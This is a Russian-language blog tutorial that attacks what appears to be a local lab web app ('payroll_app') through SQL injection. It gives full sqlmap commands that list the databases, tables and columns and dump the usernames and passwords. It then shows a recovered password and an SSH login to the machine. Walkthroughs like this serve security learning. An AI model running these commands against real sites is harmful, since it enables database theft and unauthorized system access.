Найти тему
Amiexist

Printf('sql injection\n')

Доброго времени суток, дорогие друзья

Сегодня мы будем подсаживать на геро.... наш веб сайт. А если конкретнее, то экспортировать уязвимость sql injection

Мы видим поле ввода. Для эксплуатации данной уязвимости, я воспользуюсь утилитой sqlmap.

-2

sudo sqlmap -u http://192.168.0.109/payroll_app --random-agent -dbs --forms

Флаг -u расшифровывается как url, после него нужно указать целевой url

Флаг -dbs означает databases он выводит все базы данных

Флаг --forms позволяет sqlmap искать формы для ввода логина и пароля

-3

Мы видим возможные базы данных. Лично меня заинтересовала payroll

-4

Что бы указать базу данных нужно использовать флаг -D .И название бд

Что бы увидеть все таблицы в это бд, нужен флаг --tables

-5

У нас есть одна доступная таблица 'users'

Указываем её в sqlmap

sudo sqlmap -u http://192.168.0.109/payroll_app --random-agent -D payroll -T users --columns --forms

Флаг -T указывает sqlmap таблицу

--columns выводит возможные колонки

-6

Из интересного, мы видим колонки username и password

Дабы посмотреть их содержимое указываем их в sqlmap под флагом -C

Одной командой password

Второй username

-7

И обязательно ставим флаг --dump. Иначе sqlmap ничего не выведет

sudo sqlmap -u http://192.168.0.109/payroll_app --random-agent -D payroll -T users -C password --dump --forms

-8

sudo sqlmap -u http://192.168.0.109/payroll_app --random-agent -D payroll -T users -C username --dump --forms

Пароль буду подбирать к пользователю kylo_ren. После 4 попыток, я подобрал пароль

Пароль от этого юзера: 'Daddy_Issuyes2'

-9

На этой машине также открыт 22 порт

С сервисом ssh

-10

Попробую подключиться к этой машине черещ ssh используя известные данные авторизации

ssh kylo_ren@192.168.0.108

В вопросе есть ли у нас пароль пишем yes

И вводим его

-11

Вот и все

Мы получили доступ к машине используя уязвимость sql injection.

На это данная статья заканчивается

Огромное спасибо тем людям, кто дочитал до этого момента

И самое главное - учите asm:)